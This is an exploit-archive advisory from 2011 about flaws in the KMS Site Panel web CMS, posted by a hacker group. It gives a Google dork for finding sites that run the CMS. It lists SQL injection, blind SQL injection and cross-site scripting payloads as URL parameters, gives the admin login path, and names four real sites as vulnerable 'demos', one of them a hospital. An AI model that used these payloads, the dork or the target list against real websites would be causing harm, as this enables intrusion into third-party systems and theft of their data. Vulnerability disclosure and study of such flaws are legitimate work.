KMS Site Panel multiple Vulnerability

2011.08.12
Credit: alieye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

&#65279;"KMS Site Panel multiple Vulnerability" Author: alieye E-mail: cseye_ut@yahoo.com Vendor : http://www.mediasoft.ir/ Version: All version class : remote Google dork (lang=Farsi) : "&#1591;&#1585;&#1575;&#1581;&#1610; &#1608; &#1575;&#1580;&#1585;&#1575;&#1610; &#1587;&#1575;&#1610;&#1578;: &#1588;&#1585;&#1603;&#1578; &#1585;&#1575;&#1740;&#1575;&#1606; &#1585;&#1587;&#1575;&#1606;&#1607; &#1603;&#1740;&#1588;" We Are: Alieye , Z0d14c , Bully13 , Alichi & All Iranian Hackers greetz: C.S.Eye Security Team members Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com ---------------------------------------------------------------- Blind SQL Injection 1-/index.php?PageID=43-2+2*3-6 2-/index.php?ATPID=5&PSID=4-2+2*3-6 ---------------------------------------------------------------- Cross Site Scripting 3-/index.php?ATPID=5&PSID=<ScRiPt >prompt(989309)</ScRiPt>&VID=5 4-input SearchText set to <ScRiPt >prompt(989309)</ScRiPt> ---------------------------------------------------------------- SQL injection 5-/index.php?ATPID=4' 6-/index.php?ATPID=4&PSID=2' 7-/index.php?PageID=45' ---------------------------------------------------------------- login page http://site/CP/CP.php ---------------------------------------------------------------- demo website: http://www.kish-hospital.com/ http://kishtourism.ir/ http://www.kishmalls.net/ http://www.shahrsazan.com/

References:

http://www.mediasoft.ir/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top